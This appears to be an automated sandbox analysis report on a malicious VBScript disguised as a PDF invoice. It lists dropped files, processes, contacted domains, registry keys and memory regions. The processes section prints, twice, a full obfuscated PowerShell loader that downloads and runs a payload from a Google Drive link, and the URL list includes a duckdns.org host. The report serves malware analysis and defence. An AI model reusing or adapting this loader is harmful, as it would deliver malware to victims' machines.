Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
18000012550_20240930_0078864246#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpr5gp2x.0li.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksokqut4.z4a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhqrbe3x.dn1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztwtpfhm.rbg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Forsvarsministers.Sca
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret
Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for(
$Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function
Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5
Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel
LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem
h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo
BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto
';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo
HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho
SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz
S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv
Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres
(Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$
AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al
Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi
al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge
(Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN
Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr
Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch
ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay
TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts '
Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme-
rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd
LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste
R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit
moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts
' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei
midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl
KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC
phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap
MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres
(Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt
v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee
PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo
yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea
snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO
eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel
OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E
bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$
Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv
dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC
mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor
o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H
sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali
TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts
'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm
In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l
vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres
(Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP
sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb
SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret
Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for(
$Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function
Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5
Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel
LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem
h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo
BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto
';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo
HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho
SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz
S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv
Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres
(Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$
AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al
Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi
al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge
(Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN
Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr
Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch
ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay
TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts '
Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme-
rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd
LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste
R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit
moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts
' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei
midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl
KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC
phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap
MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres
(Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt
v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee
PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo
yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea
snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO
eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel
OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E
bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$
Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv
dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC
mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor
o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H
sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali
TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts
'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm
In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l
vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres
(Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP
sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb
SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\syswow64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
a458386d9.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com/o
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/g
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 16 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
216.58.206.78
|
||
|
drive.usercontent.google.com
|
142.250.185.97
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
216.58.206.78
|
drive.google.com
|
United States
|
||
|
142.250.185.97
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8250000
|
direct allocation
|
page execute and read and write
|
|
|
|
743E000
|
heap
|
page read and write
|
|
|
|
B27C000
|
direct allocation
|
page execute and read and write
|
|
|
|
54F9000
|
trusted library allocation
|
page read and write
|
|
|
|
291902A5000
|
trusted library allocation
|
page read and write
|
|
|
|
6ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
6940000
|
direct allocation
|
page read and write
|
||
|
774000
|
heap
|
page read and write
|
||
|
2919898F000
|
heap
|
page read and write
|
||
|
950000
|
trusted library allocation
|
page read and write
|
||
|
F2B077E000
|
stack
|
page read and write
|
||
|
7F7E000
|
stack
|
page read and write
|
||
|
24903B68000
|
heap
|
page read and write
|
||
|
29180DE8000
|
trusted library allocation
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
4480000
|
heap
|
page execute and read and write
|
||
|
97A000
|
trusted library allocation
|
page execute and read and write
|
||
|
F2B178B000
|
stack
|
page read and write
|
||
|
44F3000
|
trusted library allocation
|
page read and write
|
||
|
291988E5000
|
heap
|
page read and write
|
||
|
F2B168E000
|
stack
|
page read and write
|
||
|
7480000
|
heap
|
page read and write
|
||
|
721B000
|
stack
|
page read and write
|
||
|
7FF886D12000
|
trusted library allocation
|
page read and write
|
||
|
24901DCA000
|
heap
|
page read and write
|
||
|
9E7C000
|
direct allocation
|
page execute and read and write
|
||
|
6990000
|
direct allocation
|
page read and write
|
||
|
7FF886CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7480000
|
heap
|
page read and write
|
||
|
70E000
|
stack
|
page read and write
|
||
|
22800000
|
heap
|
page read and write
|
||
|
F2B01F3000
|
stack
|
page read and write
|
||
|
710D000
|
stack
|
page read and write
|
||
|
29190231000
|
trusted library allocation
|
page read and write
|
||
|
83D0000
|
direct allocation
|
page read and write
|
||
|
6EC0000
|
trusted library allocation
|
page read and write
|
||
|
43EE000
|
stack
|
page read and write
|
||
|
6E0D000
|
heap
|
page read and write
|
||
|
24903CBF000
|
heap
|
page read and write
|
||
|
43CC000
|
remote allocation
|
page execute and read and write
|
||
|
22440000
|
direct allocation
|
page read and write
|
||
|
F2B180B000
|
stack
|
page read and write
|
||
|
29182034000
|
trusted library allocation
|
page read and write
|
||
|
4DCC000
|
remote allocation
|
page execute and read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
7480000
|
heap
|
page read and write
|
||
|
3D5000
|
heap
|
page read and write
|
||
|
6E67000
|
heap
|
page read and write
|
||
|
F2B0BBE000
|
stack
|
page read and write
|
||
|
29180020000
|
trusted library allocation
|
page read and write
|
||
|
6BCC000
|
remote allocation
|
page execute and read and write
|
||
|
291FE52D000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
24901D2B000
|
heap
|
page read and write
|
||
|
24903B80000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
F2B0878000
|
stack
|
page read and write
|
||
|
22430000
|
direct allocation
|
page read and write
|
||
|
291808DD000
|
trusted library allocation
|
page read and write
|
||
|
24903B62000
|
heap
|
page read and write
|
||
|
24903CDD000
|
heap
|
page read and write
|
||
|
6DDE000
|
heap
|
page read and write
|
||
|
24901DDD000
|
heap
|
page read and write
|
||
|
684E000
|
stack
|
page read and write
|
||
|
730000
|
trusted library section
|
page read and write
|
||
|
29198688000
|
heap
|
page read and write
|
||
|
7FF886CE1000
|
trusted library allocation
|
page read and write
|
||
|
291986DC000
|
heap
|
page read and write
|
||
|
291988C0000
|
heap
|
page read and write
|
||
|
39CC000
|
remote allocation
|
page execute and read and write
|
||
|
6FF0000
|
trusted library allocation
|
page read and write
|
||
|
267B000
|
stack
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
22D9C000
|
stack
|
page read and write
|
||
|
29181E86000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
291986DE000
|
heap
|
page read and write
|
||
|
F2B05FE000
|
stack
|
page read and write
|
||
|
24903CF2000
|
heap
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
291806C4000
|
trusted library allocation
|
page read and write
|
||
|
263C000
|
stack
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
91C000
|
heap
|
page read and write
|
||
|
24903CB3000
|
heap
|
page read and write
|
||
|
6930000
|
direct allocation
|
page read and write
|
||
|
29181EAC000
|
trusted library allocation
|
page read and write
|
||
|
6C10000
|
heap
|
page read and write
|
||
|
953000
|
trusted library allocation
|
page execute and read and write
|
||
|
704E000
|
stack
|
page read and write
|
||
|
7FF886E90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
291FE4EE000
|
heap
|
page read and write
|
||
|
F2B170D000
|
stack
|
page read and write
|
||
|
745C000
|
heap
|
page read and write
|
||
|
291988F1000
|
heap
|
page read and write
|
||
|
24903B91000
|
heap
|
page read and write
|
||
|
291806EA000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B33000
|
trusted library allocation
|
page execute and read and write
|
||
|
4338000
|
heap
|
page read and write
|
||
|
22450000
|
direct allocation
|
page read and write
|
||
|
24901DD7000
|
heap
|
page read and write
|
||
|
29181EBF000
|
trusted library allocation
|
page read and write
|
||
|
24902055000
|
heap
|
page read and write
|
||
|
24901DD6000
|
heap
|
page read and write
|
||
|
7BA7000
|
stack
|
